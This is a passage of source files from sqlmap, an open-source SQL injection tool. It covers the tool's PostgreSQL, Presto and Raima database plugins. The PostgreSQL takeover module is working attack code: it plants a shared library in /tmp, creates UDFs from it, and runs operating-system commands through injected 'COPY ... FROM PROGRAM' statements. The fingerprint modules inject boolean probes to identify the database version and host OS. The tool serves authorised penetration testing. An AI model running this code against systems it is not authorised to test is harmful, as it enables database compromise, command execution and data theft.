Backend.setVersionList([\">= 9.1.0\", \"< 9.2.0\"])\n            elif inject.checkBooleanExpression(\"LENGTH(TO_CHAR(1,'EEEE'))>0\"):\n                Backend.setVersionList([\">= 9.0.0\", \"< 9.1.0\"])\n            elif inject.checkBooleanExpression(\"2=(SELECT DIV(6,3))\"):\n                Backend.setVersionList([\">= 8.4.0\", \"< 9.0.0\"])\n            elif inject.checkBooleanExpression(\"EXTRACT(ISODOW FROM CURRENT_TIMESTAMP)<8\"):\n                Backend.setVersionList([\">= 8.3.0\", \"< 8.4.0\"])\n            elif inject.checkBooleanExpression(\"ISFINITE(TRANSACTION_TIMESTAMP())\"):\n                Backend.setVersionList([\">= 8.2.0\", \"< 8.3.0\"])\n            elif inject.checkBooleanExpression(\"9=(SELECT GREATEST(5,9,1))\"):\n                Backend.setVersionList([\">= 8.1.0\", \"< 8.2.0\"])\n            elif inject.checkBooleanExpression(\"3=(SELECT WIDTH_BUCKET(5.35,0.024,10.06,5))\"):\n                Backend.setVersionList([\">= 8.0.0\", \"< 8.1.0\"])\n            elif inject.checkBooleanExpression(\"'d'=(SELECT SUBSTR(MD5('sqlmap'),1,1))\"):\n                Backend.setVersionList([\">= 7.4.0\", \"< 8.0.0\"])\n            elif inject.checkBooleanExpression(\"'p'=(SELECT SUBSTR(CURRENT_SCHEMA(),1,1))\"):\n                Backend.setVersionList([\">= 7.3.0\", \"< 7.4.0\"])\n            elif inject.checkBooleanExpression(\"8=(SELECT BIT_LENGTH(1))\"):\n                Backend.setVersionList([\">= 7.2.0\", \"< 7.3.0\"])\n            elif inject.checkBooleanExpression(\"'a'=(SELECT SUBSTR(QUOTE_LITERAL('a'),2,1))\"):\n                Backend.setVersionList([\">= 7.1.0\", \"< 7.2.0\"])\n            elif inject.checkBooleanExpression(\"8=(SELECT POW(2,3))\"):\n                Backend.setVersionList([\">= 7.0.0\", \"< 7.1.0\"])\n            elif inject.checkBooleanExpression(\"'a'=(SELECT MAX('a'))\"):\n                Backend.setVersionList([\">= 6.5.0\", \"< 6.5.3\"])\n            elif inject.checkBooleanExpression(\"VERSION()=VERSION()\"):\n                Backend.setVersionList([\">= 6.4.0\", \"< 6.5.0\"])\n            elif inject.checkBooleanExpression(\"2=(SELECT SUBSTR(CURRENT_DATE,1,1))\"):\n                Backend.setVersionList([\">= 6.3.0\", \"< 6.4.0\"])\n            elif inject.checkBooleanExpression(\"'s'=(SELECT SUBSTRING('sqlmap',1,1))\"):\n                Backend.setVersionList([\">= 6.2.0\", \"< 6.3.0\"])\n            else:\n                Backend.setVersion(\"< 6.2.0\")\n\n            return True\n        else:\n            warnMsg = \"the back-end DBMS is not %s\" % DBMS.PGSQL\n            logger.warning(warnMsg)\n\n            return False\n\n    def checkDbmsOs(self, detailed=False):\n        if Backend.getOs():\n            return\n\n        infoMsg = \"fingerprinting the back-end DBMS operating system\"\n        logger.info(infoMsg)\n\n        self.createSupportTbl(self.fileTblName, self.tblField, \"character(10000)\")\n        inject.goStacked(\"INSERT INTO %s(%s) VALUES (%s)\" % (self.fileTblName, self.tblField, \"VERSION()\"))\n\n        # Windows executables should always have ' Visual C++' or ' mingw'\n        # patterns within the banner\n        osWindows = (\" Visual C++\", \"mingw\")\n\n        for osPattern in osWindows:\n            query = \"(SELECT LENGTH(%s) FROM %s WHERE %s \" % (self.tblField, self.fileTblName, self.tblField)\n            query += \"LIKE '%\" + osPattern + \"%')>0\"\n\n            if inject.checkBooleanExpression(query):\n                Backend.setOs(OS.WINDOWS)\n\n                break\n\n        if Backend.getOs() is None:\n            Backend.setOs(OS.LINUX)\n\n        infoMsg = \"the back-end DBMS operating system is %s\" % Backend.getOs()\n        logger.info(infoMsg)\n\n        self.cleanup(onlyFileTbl=True)\n"
  },
  {
    "path": "sqlmap/plugins/dbms/postgresql/syntax.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom lib.core.convert import getOrds\nfrom plugins.generic.syntax import Syntax as GenericSyntax\n\nclass Syntax(GenericSyntax):\n    @staticmethod\n    def escape(expression, quote=True):\n        \"\"\"\n        Note: PostgreSQL has a general problem with concenation operator (||) precedence (hence the parentheses enclosing)\n              e.g. SELECT 1 WHERE 'a'!='a'||'b' will trigger error (\"argument of WHERE must be type boolean, not type text\")\n\n        >>> Syntax.escape(\"SELECT 'abcdefgh' FROM foobar\") == \"SELECT (CHR(97)||CHR(98)||CHR(99)||CHR(100)||CHR(101)||CHR(102)||CHR(103)||CHR(104)) FROM foobar\"\n        True\n        \"\"\"\n\n        def escaper(value):\n            return \"(%s)\" % \"||\".join(\"CHR(%d)\" % _ for _ in getOrds(value))  # Postgres CHR() function already accepts Unicode code point of character(s)\n\n        return Syntax._escape(expression, quote, escaper)\n"
  },
  {
    "path": "sqlmap/plugins/dbms/postgresql/takeover.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nimport os\n\nfrom lib.core.common import Backend\nfrom lib.core.common import checkFile\nfrom lib.core.common import decloakToTemp\nfrom lib.core.common import flattenValue\nfrom lib.core.common import filterNone\nfrom lib.core.common import isListLike\nfrom lib.core.common import isNoneValue\nfrom lib.core.common import isStackingAvailable\nfrom lib.core.common import randomStr\nfrom lib.core.compat import LooseVersion\nfrom lib.core.data import kb\nfrom lib.core.data import logger\nfrom lib.core.data import paths\nfrom lib.core.enums import OS\nfrom lib.core.exception import SqlmapSystemException\nfrom lib.core.exception import SqlmapUnsupportedFeatureException\nfrom lib.request import inject\nfrom plugins.generic.takeover import Takeover as GenericTakeover\n\nclass Takeover(GenericTakeover):\n    def udfSetRemotePath(self):\n        # On Windows\n        if Backend.isOs(OS.WINDOWS):\n            # The DLL can be in any folder where postgres user has\n            # read/write/execute access is valid\n            # NOTE: by not specifing any path, it will save into the\n            # data directory, on PostgreSQL 8.3 it is\n            # C:\\Program Files\\PostgreSQL\\8.3\\data.\n            self.udfRemoteFile = \"%s.%s\" % (self.udfSharedLibName, self.udfSharedLibExt)\n\n        # On Linux\n        else:\n            # The SO can be in any folder where postgres user has\n            # read/write/execute access is valid\n            self.udfRemoteFile = \"/tmp/%s.%s\" % (self.udfSharedLibName, self.udfSharedLibExt)\n\n    def udfSetLocalPaths(self):\n        self.udfLocalFile = paths.SQLMAP_UDF_PATH\n        self.udfSharedLibName = \"libs%s\" % randomStr(lowercase=True)\n\n        self.getVersionFromBanner()\n\n        banVer = kb.bannerFp[\"dbmsVersion\"]\n\n        if not banVer or not banVer[0].isdigit():\n            errMsg = \"unsupported feature on unknown version of PostgreSQL\"\n            raise SqlmapUnsupportedFeatureException(errMsg)\n        elif LooseVersion(banVer) >= LooseVersion(\"10\"):\n            majorVer = banVer.split('.')[0]\n        elif LooseVersion(banVer) >= LooseVersion(\"8.2\") and '.' in banVer:\n            majorVer = '.'.join(banVer.split('.')[:2])\n        else:\n            errMsg = \"unsupported feature on versions of PostgreSQL before 8.2\"\n            raise SqlmapUnsupportedFeatureException(errMsg)\n\n        try:\n            if Backend.isOs(OS.WINDOWS):\n                _ = os.path.join(self.udfLocalFile, \"postgresql\", \"windows\", \"%d\" % Backend.getArch(), majorVer, \"lib_postgresqludf_sys.dll_\")\n                checkFile(_)\n                self.udfLocalFile = decloakToTemp(_)\n                self.udfSharedLibExt = \"dll\"\n            else:\n                _ = os.path.join(self.udfLocalFile, \"postgresql\", \"linux\", \"%d\" % Backend.getArch(), majorVer, \"lib_postgresqludf_sys.so_\")\n                checkFile(_)\n                self.udfLocalFile = decloakToTemp(_)\n                self.udfSharedLibExt = \"so\"\n        except SqlmapSystemException:\n            errMsg = \"unsupported feature on PostgreSQL %s (%s-bit)\" % (majorVer, Backend.getArch())\n            raise SqlmapUnsupportedFeatureException(errMsg)\n\n    def udfCreateFromSharedLib(self, udf, inpRet):\n        if udf in self.udfToCreate:\n            logger.info(\"creating UDF '%s' from the binary UDF file\" % udf)\n\n            inp = \", \".join(i for i in inpRet[\"input\"])\n            ret = inpRet[\"return\"]\n\n            # Reference: http://www.postgresql.org/docs/8.3/interactive/sql-createfunction.html\n            inject.goStacked(\"DROP FUNCTION %s(%s)\" % (udf, inp))\n            inject.goStacked(\"CREATE OR REPLACE FUNCTION %s(%s) RETURNS %s AS '%s', '%s' LANGUAGE C RETURNS NULL ON NULL INPUT IMMUTABLE\" % (udf, inp, ret, self.udfRemoteFile, udf))\n\n            self.createdUdf.add(udf)\n        else:\n            logger.debug(\"keeping existing UDF '%s' as requested\" % udf)\n\n    def uncPathRequest(self):\n        self.createSupportTbl(self.fileTblName, self.tblField, \"text\")\n        inject.goStacked(\"COPY %s(%s) FROM '%s'\" % (self.fileTblName, self.tblField, self.uncPath), silent=True)\n        self.cleanup(onlyFileTbl=True)\n\n    def copyExecCmd(self, cmd):\n        output = None\n\n        if isStackingAvailable():\n            # Reference: https://medium.com/greenwolf-security/authenticated-arbitrary-command-execution-on-postgresql-9-3-latest-cd18945914d5\n            self._forgedCmd = \"DROP TABLE IF EXISTS %s;\" % self.cmdTblName\n            self._forgedCmd += \"CREATE TABLE %s(%s text);\" % (self.cmdTblName, self.tblField)\n            self._forgedCmd += \"COPY %s FROM PROGRAM '%s';\" % (self.cmdTblName, cmd.replace(\"'\", \"''\"))\n            inject.goStacked(self._forgedCmd)\n\n            query = \"SELECT %s FROM %s\" % (self.tblField, self.cmdTblName)\n            output = inject.getValue(query, resumeValue=False)\n\n            if isListLike(output):\n                output = flattenValue(output)\n                output = filterNone(output)\n\n                if not isNoneValue(output):\n                    output = os.linesep.join(output)\n\n            self._cleanupCmd = \"DROP TABLE %s\" % self.cmdTblName\n            inject.goStacked(self._cleanupCmd)\n\n        return output\n\n    def checkCopyExec(self):\n        if kb.copyExecTest is None:\n            kb.copyExecTest = self.copyExecCmd(\"echo 1\") == '1'\n\n        return kb.copyExecTest\n"
  },
  {
    "path": "sqlmap/plugins/dbms/presto/__init__.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom lib.core.enums import DBMS\nfrom lib.core.settings import PRESTO_SYSTEM_DBS\nfrom lib.core.unescaper import unescaper\n\nfrom plugins.dbms.presto.enumeration import Enumeration\nfrom plugins.dbms.presto.filesystem import Filesystem\nfrom plugins.dbms.presto.fingerprint import Fingerprint\nfrom plugins.dbms.presto.syntax import Syntax\nfrom plugins.dbms.presto.takeover import Takeover\nfrom plugins.generic.misc import Miscellaneous\n\nclass PrestoMap(Syntax, Fingerprint, Enumeration, Filesystem, Miscellaneous, Takeover):\n    \"\"\"\n    This class defines Presto methods\n    \"\"\"\n\n    def __init__(self):\n        self.excludeDbsList = PRESTO_SYSTEM_DBS\n\n        for cls in self.__class__.__bases__:\n            cls.__init__(self)\n\n    unescaper[DBMS.PRESTO] = Syntax.escape\n"
  },
  {
    "path": "sqlmap/plugins/dbms/presto/connector.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\ntry:\n    import prestodb\nexcept:\n    pass\n\nimport logging\nimport struct\n\nfrom lib.core.common import getSafeExString\nfrom lib.core.data import conf\nfrom lib.core.data import logger\nfrom lib.core.exception import SqlmapConnectionException\nfrom plugins.generic.connector import Connector as GenericConnector\n\nclass Connector(GenericConnector):\n    \"\"\"\n    Homepage: https://github.com/prestodb/presto-python-client\n    User guide: https://github.com/prestodb/presto-python-client/blob/master/README.md\n    API: https://www.python.org/dev/peps/pep-0249/\n    PyPI package: presto-python-client\n    License: Apache License 2.0\n    \"\"\"\n\n    def connect(self):\n        self.initConnection()\n\n        try:\n            self.connector = prestodb.dbapi.connect(host=self.hostname, user=self.user, catalog=self.db, port=self.port, request_timeout=conf.timeout)\n        except (prestodb.exceptions.OperationalError, prestodb.exceptions.InternalError, prestodb.exceptions.ProgrammingError, struct.error) as ex:\n            raise SqlmapConnectionException(getSafeExString(ex))\n\n        self.initCursor()\n        self.printConnected()\n\n    def fetchall(self):\n        try:\n            return self.cursor.fetchall()\n        except prestodb.exceptions.ProgrammingError as ex:\n            logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, \"(remote) %s\" % getSafeExString(ex))\n            return None\n\n    def execute(self, query):\n        retVal = False\n\n        try:\n            self.cursor.execute(query)\n            retVal = True\n        except (prestodb.exceptions.OperationalError, prestodb.exceptions.ProgrammingError) as ex:\n            logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, \"(remote) %s\" % getSafeExString(ex))\n        except prestodb.exceptions.InternalError as ex:\n            raise SqlmapConnectionException(getSafeExString(ex))\n\n        self.connector.commit()\n\n        return retVal\n\n    def select(self, query):\n        retVal = None\n\n        if self.execute(query):\n            retVal = self.fetchall()\n\n        return retVal\n"
  },
  {
    "path": "sqlmap/plugins/dbms/presto/enumeration.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom lib.core.data import logger\nfrom plugins.generic.enumeration import Enumeration as GenericEnumeration\n\nclass Enumeration(GenericEnumeration):\n    def getBanner(self):\n        warnMsg = \"on Presto it is not possible to get the banner\"\n        logger.warning(warnMsg)\n\n        return None\n\n    def getCurrentDb(self):\n        warnMsg = \"on Presto it is not possible to get name of the current database (schema)\"\n        logger.warning(warnMsg)\n\n    def isDba(self, user=None):\n        warnMsg = \"on Presto it is not possible to test if current user is DBA\"\n        logger.warning(warnMsg)\n\n    def getUsers(self):\n        warnMsg = \"on Presto it is not possible to enumerate the users\"\n        logger.warning(warnMsg)\n\n        return []\n\n    def getPasswordHashes(self):\n        warnMsg = \"on Presto it is not possible to enumerate the user password hashes\"\n        logger.warning(warnMsg)\n\n        return {}\n\n    def getPrivileges(self, *args, **kwargs):\n        warnMsg = \"on Presto it is not possible to enumerate the user privileges\"\n        logger.warning(warnMsg)\n\n        return {}\n\n    def getRoles(self, *args, **kwargs):\n        warnMsg = \"on Presto it is not possible to enumerate the user roles\"\n        logger.warning(warnMsg)\n\n        return {}\n\n    def getHostname(self):\n        warnMsg = \"on Presto it is not possible to enumerate the hostname\"\n        logger.warning(warnMsg)\n\n    def getStatements(self):\n        warnMsg = \"on Presto it is not possible to enumerate the SQL statements\"\n        logger.warning(warnMsg)\n\n        return []\n"
  },
  {
    "path": "sqlmap/plugins/dbms/presto/filesystem.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom lib.core.exception import SqlmapUnsupportedFeatureException\nfrom plugins.generic.filesystem import Filesystem as GenericFilesystem\n\nclass Filesystem(GenericFilesystem):\n    def readFile(self, remoteFile):\n        errMsg = \"on Presto it is not possible to read files\"\n        raise SqlmapUnsupportedFeatureException(errMsg)\n\n    def writeFile(self, localFile, remoteFile, fileType=None, forceCheck=False):\n        errMsg = \"on Presto it is not possible to write files\"\n        raise SqlmapUnsupportedFeatureException(errMsg)\n"
  },
  {
    "path": "sqlmap/plugins/dbms/presto/fingerprint.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom lib.core.common import Backend\nfrom lib.core.common import Format\nfrom lib.core.data import conf\nfrom lib.core.data import kb\nfrom lib.core.data import logger\nfrom lib.core.enums import DBMS\nfrom lib.core.session import setDbms\nfrom lib.core.settings import PRESTO_ALIASES\nfrom lib.request import inject\nfrom plugins.generic.fingerprint import Fingerprint as GenericFingerprint\n\nclass Fingerprint(GenericFingerprint):\n    def __init__(self):\n        GenericFingerprint.__init__(self, DBMS.PRESTO)\n\n    def getFingerprint(self):\n        value = \"\"\n        wsOsFp = Format.getOs(\"web server\", kb.headersFp)\n\n        if wsOsFp:\n            value += \"%s\\n\" % wsOsFp\n\n        if kb.data.banner:\n            dbmsOsFp = Format.getOs(\"back-end DBMS\", kb.bannerFp)\n\n            if dbmsOsFp:\n                value += \"%s\\n\" % dbmsOsFp\n\n        value += \"back-end DBMS: \"\n\n        if not conf.extensiveFp:\n            value += DBMS.PRESTO\n            return value\n\n        actVer = Format.getDbms()\n        blank = \" \" * 15\n        value += \"active fingerprint: %s\" % actVer\n\n        if kb.bannerFp:\n            banVer = kb.bannerFp.get(\"dbmsVersion\")\n\n            if banVer:\n                banVer = Format.getDbms([banVer])\n                value += \"\\n%sbanner parsing fingerprint: %s\" % (blank, banVer)\n\n        htmlErrorFp = Format.getErrorParsedDBMSes()\n\n        if htmlErrorFp:\n            value += \"\\n%shtml error message fingerprint: %s\" % (blank, htmlErrorFp)\n\n        return value\n\n    def checkDbms(self):\n        if not conf.extensiveFp and Backend.isDbmsWithin(PRESTO_ALIASES):\n            setDbms(DBMS.PRESTO)\n\n            self.getBanner()\n\n            return True\n\n        infoMsg = \"testing %s\" % DBMS.PRESTO\n        logger.info(infoMsg)\n\n        result = inject.checkBooleanExpression(\"TO_BASE64URL(NULL) IS NULL\")\n\n        if result:\n            infoMsg = \"confirming %s\" % DBMS.PRESTO\n            logger.info(infoMsg)\n\n            result = inject.checkBooleanExpression(\"TO_HEX(FROM_HEX(NULL)) IS NULL\")\n\n            if not result:\n                warnMsg = \"the back-end DBMS is not %s\" % DBMS.PRESTO\n                logger.warning(warnMsg)\n\n                return False\n\n            setDbms(DBMS.PRESTO)\n\n            if not conf.extensiveFp:\n                return True\n\n            infoMsg = \"actively fingerprinting %s\" % DBMS.PRESTO\n            logger.info(infoMsg)\n\n            # Reference: https://prestodb.io/docs/current/release/release-0.200.html\n            if inject.checkBooleanExpression(\"FROM_IEEE754_32(NULL) IS NULL\"):\n                Backend.setVersion(\">= 0.200\")\n            # Reference: https://prestodb.io/docs/current/release/release-0.193.html\n            elif inject.checkBooleanExpression(\"NORMAL_CDF(NULL,NULL,NULL) IS NULL\"):\n                Backend.setVersion(\">= 0.193\")\n            # Reference: https://prestodb.io/docs/current/release/release-0.183.html\n            elif inject.checkBooleanExpression(\"MAP_ENTRIES(NULL) IS NULL\"):\n                Backend.setVersion(\">= 0.183\")\n            # Reference: https://prestodb.io/docs/current/release/release-0.171.html\n            elif inject.checkBooleanExpression(\"CODEPOINT(NULL) IS NULL\"):\n                Backend.setVersion(\">= 0.171\")\n            # Reference: https://prestodb.io/docs/current/release/release-0.162.html\n            elif inject.checkBooleanExpression(\"XXHASH64(NULL) IS NULL\"):\n                Backend.setVersion(\">= 0.162\")\n            # Reference: https://prestodb.io/docs/current/release/release-0.151.html\n            elif inject.checkBooleanExpression(\"COSINE_SIMILARITY(NULL,NULL) IS NULL\"):\n                Backend.setVersion(\">= 0.151\")\n            # Reference: https://prestodb.io/docs/current/release/release-0.143.html\n            elif inject.checkBooleanExpression(\"TRUNCATE(NULL) IS NULL\"):\n                Backend.setVersion(\">= 0.143\")\n            # Reference: https://prestodb.io/docs/current/release/release-0.137.html\n            elif inject.checkBooleanExpression(\"BIT_COUNT(NULL,NULL) IS NULL\"):\n                Backend.setVersion(\">= 0.137\")\n            # Reference: https://prestodb.io/docs/current/release/release-0.130.html\n            elif inject.checkBooleanExpression(\"MAP_CONCAT(NULL,NULL) IS NULL\"):\n                Backend.setVersion(\">= 0.130\")\n            # Reference: https://prestodb.io/docs/current/release/release-0.115.html\n            elif inject.checkBooleanExpression(\"SHA1(NULL) IS NULL\"):\n                Backend.setVersion(\">= 0.115\")\n            # Reference: https://prestodb.io/docs/current/release/release-0.100.html\n            elif inject.checkBooleanExpression(\"SPLIT(NULL,NULL) IS NULL\"):\n                Backend.setVersion(\">= 0.100\")\n            # Reference: https://prestodb.io/docs/current/release/release-0.70.html\n            elif inject.checkBooleanExpression(\"GREATEST(NULL,NULL) IS NULL\"):\n                Backend.setVersion(\">= 0.70\")\n            else:\n                Backend.setVersion(\"< 0.100\")\n\n            return True\n        else:\n            warnMsg = \"the back-end DBMS is not %s\" % DBMS.PRESTO\n            logger.warning(warnMsg)\n\n            return False\n"
  },
  {
    "path": "sqlmap/plugins/dbms/presto/syntax.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom lib.core.convert import getOrds\nfrom plugins.generic.syntax import Syntax as GenericSyntax\n\nclass Syntax(GenericSyntax):\n    @staticmethod\n    def escape(expression, quote=True):\n        \"\"\"\n        >>> Syntax.escape(\"SELECT 'abcdefgh' FROM foobar\") == \"SELECT CHR(97)||CHR(98)||CHR(99)||CHR(100)||CHR(101)||CHR(102)||CHR(103)||CHR(104) FROM foobar\"\n        True\n        \"\"\"\n\n        def escaper(value):\n            return \"||\".join(\"CHR(%d)\" % _ for _ in getOrds(value))\n\n        return Syntax._escape(expression, quote, escaper)\n"
  },
  {
    "path": "sqlmap/plugins/dbms/presto/takeover.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom lib.core.exception import SqlmapUnsupportedFeatureException\nfrom plugins.generic.takeover import Takeover as GenericTakeover\n\nclass Takeover(GenericTakeover):\n    def osCmd(self):\n        errMsg = \"on Presto it is not possible to execute commands\"\n        raise SqlmapUnsupportedFeatureException(errMsg)\n\n    def osShell(self):\n        errMsg = \"on Presto it is not possible to execute commands\"\n        raise SqlmapUnsupportedFeatureException(errMsg)\n\n    def osPwn(self):\n        errMsg = \"on Presto it is not possible to establish an \"\n        errMsg += \"out-of-band connection\"\n        raise SqlmapUnsupportedFeatureException(errMsg)\n\n    def osSmb(self):\n        errMsg = \"on Presto it is not possible to establish an \"\n        errMsg += \"out-of-band connection\"\n        raise SqlmapUnsupportedFeatureException(errMsg)\n"
  },
  {
    "path": "sqlmap/plugins/dbms/raima/__init__.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom lib.core.enums import DBMS\nfrom lib.core.settings import RAIMA_SYSTEM_DBS\nfrom lib.core.unescaper import unescaper\nfrom plugins.dbms.raima.enumeration import Enumeration\nfrom plugins.dbms.raima.filesystem import Filesystem\nfrom plugins.dbms.raima.fingerprint import Fingerprint\nfrom plugins.dbms.raima.syntax import Syntax\nfrom plugins.dbms.raima.takeover import Takeover\nfrom plugins.generic.misc import Miscellaneous\n\nclass RaimaMap(Syntax, Fingerprint, Enumeration, Filesystem, Miscellaneous, Takeover):\n    \"\"\"\n    This class defines Raima methods\n    \"\"\"\n\n    def __init__(self):\n        self.excludeDbsList = RAIMA_SYSTEM_DBS\n\n        for cls in self.__class__.__bases__:\n            cls.__init__(self)\n\n    unescaper[DBMS.RAIMA] = Syntax.escape\n"
  },
  {
    "path": "sqlmap/plugins/dbms/raima/connector.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom lib.core.exception import SqlmapUnsupportedFeatureException\nfrom plugins.generic.connector import Connector as GenericConnector\n\nclass Connector(GenericConnector):\n    def connect(self):\n        errMsg = \"on Raima Database Manager it is not (currently) possible to establish a \"\n        errMsg += \"direct connection\"\n        raise SqlmapUnsupportedFeatureException(errMsg)\n"
  },
  {
    "path": "sqlmap/plugins/dbms/raima/enumeration.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom lib.core.data import logger\nfrom plugins.generic.enumeration import Enumeration as GenericEnumeration\n\nclass Enumeration(GenericEnumeration):\n    def getBanner(self):\n        warnMsg = \"on Raima Database Manager it is not possible to get the banner\"\n        logger.warning(warnMsg)\n\n        return None\n\n    def getCurrentUser(self):\n        warnMsg = \"on Raima Database Manager it is not possible to enumerate the current user\"\n        logger.warning(warnMsg)\n\n    def getCurrentDb(self):\n        warnMsg = \"on Raima Database Manager it is not possible to get name of the current database\"\n        logger.warning(warnMsg)\n\n    def isDba(self, user=None):\n        warnMsg = \"on Raima Database Manager it is not possible to test if current user is DBA\"\n        logger.warning(warnMsg)\n\n    def getUsers(self):\n        warnMsg = \"on Raima Database Manager it is not possible to enumerate the users\"\n        logger.warning(warnMsg)\n\n        return []\n\n    def getPasswordHashes(self):\n        warnMsg = \"on Raima Database Manager it is not possible to enumerate the user password hashes\"\n        logger.warning(warnMsg)\n\n        return {}\n\n    def getPrivileges(self, *args, **kwargs):\n        warnMsg = \"on Raima Database Manager it is not possible to enumerate the user privileges\"\n        logger.warning(warnMsg)\n\n        return {}\n\n    def getDbs(self):\n        warnMsg = \"on Raima Database Manager it is not possible to enumerate databases (use only '--tables')\"\n        logger.warning(warnMsg)\n\n        return []\n\n    def searchDb(self):\n        warnMsg = \"on Raima Database Manager it is not possible to search databases\"\n        logger.warning(warnMsg)\n\n        return []\n\n    def searchTable(self):\n        warnMsg = \"on Raima Database Manager it is not possible to search tables\"\n        logger.warning(warnMsg)\n\n        return []\n\n    def searchColumn(self):\n        warnMsg = \"on Raima Database Manager it is not possible to search columns\"\n        logger.warning(warnMsg)\n\n        return []\n\n    def search(self):\n        warnMsg = \"on Raima Database Manager search option is not available\"\n        logger.warning(warnMsg)\n\n    def getHostname(self):\n        warnMsg = \"on Raima Database Manager it is not possible to enumerate the hostname\"\n        logger.warning(warnMsg)\n\n    def getStatements(self):\n        warnMsg = \"on Raima Database Manager it is not possible to enumerate the SQL statements\"\n        logger.warning(warnMsg)\n\n        return []\n"
  },
  {
    "path": "sqlmap/plugins/dbms/raima/filesystem.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom lib.core.exception import SqlmapUnsupportedFeatureException\nfrom plugins.generic.filesystem import Filesystem as GenericFilesystem\n\nclass Filesystem(GenericFilesystem):\n    def readFile(self, remoteFile):\n        errMsg = \"on Raima Database Manager it is not possible to read files\"\n        raise SqlmapUnsupportedFeatureException(errMsg)\n\n    def writeFile(self, localFile, remoteFile, fileType=None, forceCheck=False):\n        errMsg = \"on Raima Database Manager it is not possible to write files\"\n        raise SqlmapUnsupportedFeatureException(errMsg)\n"
  },
  {
    "path": "sqlmap/plugins/dbms/raima/fingerprint.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom lib.core.common import Backend\nfrom lib.core.common import Format\nfrom lib.core.data import conf\nfrom lib.core.data import kb\nfrom lib.core.data import logger\nfrom lib.core.enums import DBMS\nfrom lib.core.session import setDbms\nfrom lib.core.settings import METADB_SUFFIX\nfrom lib.core.settings import RAIMA_ALIASES\nfrom lib.request import inject\nfrom plugins.generic.fingerprint import Fingerprint as GenericFingerprint\n\nclass Fingerprint(GenericFingerprint):\n    def __init__(self):\n        GenericFingerprint.__init__(self, DBMS.RAIMA)\n\n    def getFingerprint(self):\n        value = \"\"\n        wsOsFp = Format.getOs(\"web server\", kb.headersFp)\n\n        if wsOsFp:\n            value += \"%s\\n\" % wsOsFp\n\n        if kb.data.banner:\n            dbmsOsFp = Format.getOs(\"back-end DBMS\", kb.bannerFp)\n\n            if dbmsOsFp:\n                value += \"%s\\n\" % dbmsOsFp\n\n        value += \"back-end DBMS: \"\n\n        if not conf.extensiveFp:\n            value += DBMS.RAIMA\n            return value\n\n        actVer = Format.getDbms()\n        blank = \" \" * 15\n        value += \"active fingerprint: %s\" % actVer\n\n        if kb.bannerFp:\n            banVer = kb.bannerFp.get(\"dbmsVersion\")\n\n            if banVer:\n                banVer = Format.getDbms([banVer])\n                value += \"\\n%sbanner parsing fingerprint: %s\" % (blank, banVer)\n\n        htmlErrorFp = Format.getErrorParsedDBMSes()\n\n        if htmlErrorFp:\n            value += \"\\n%shtml error message fingerprint: %s\" % (blank, htmlErrorFp)\n\n        return value\n\n    def checkDbms(self):\n        if not conf.extensiveFp and Backend.isDbmsWithin(RAIMA_ALIASES):\n            setDbms(DBMS.RAIMA)\n            return True\n\n        infoMsg = \"testing %s\" % DBMS.RAIMA\n        logger.info(infoMsg)\n\n        result = inject.checkBooleanExpression(\"ROWNUMBER()=ROWNUMBER()\")\n\n        if result:\n            infoMsg = \"confirming %s\" % DBMS.RAIMA\n            logger.info(infoMsg)\n\n            result = inject.checkBooleanExpression(\"INSSTR('[RANDSTR1]',0,0,'[RANDSTR2]') IS NOT NULL\")\n\n            if not result:\n                warnMsg = \"the back-end DBMS is not %s\" % DBMS.RAIMA\n                logger.warning(warnMsg)\n\n                return False\n\n            setDbms(DBMS.RAIMA)\n\n            return True\n        else:\n            warnMsg = \"the back-end DBMS is not %s\" % DBMS.RAIMA\n            logger.warning(warnMsg)\n\n            return False\n\n    def forceDbmsEnum(self):\n        conf.db = (\"%s%s\" % (DBMS.RAIMA, METADB_SUFFIX)).replace(' ', '_')\n"
  },
  {
    "path": "sqlmap/plugins/dbms/raima/syntax.py",
